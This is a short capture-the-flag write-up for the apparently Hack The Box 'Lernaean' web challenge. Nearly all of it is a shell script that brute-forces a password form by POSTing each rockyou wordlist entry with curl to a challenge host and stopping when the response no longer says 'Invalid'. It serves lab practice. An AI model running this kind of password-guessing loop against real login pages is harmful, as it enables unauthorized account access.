Script used in Lernaean

Script used to “bruteforce” the password basic authentication in the Lernaean Web Challenge.

lernaean.sh

#!/bin/sh

ERROR="Invalid"
for PASS in $(cat /usr/share/wordlists/rockyou.txt)
do
        echo "\n### Testing password $PASS"

        (curl -X POST -d "password=$PASS" -s http://docker.hackthebox.eu:31027) > POST_Respose.txt

        grep -iq $ERROR ./POST_Respose.txt 
        if [ $? -ne 0 ]; then
                echo "\n"
                cat ./POST_Respose.txt
                exit 0;
        else
                echo "\nERROR: Invalid Password!"
        fi
done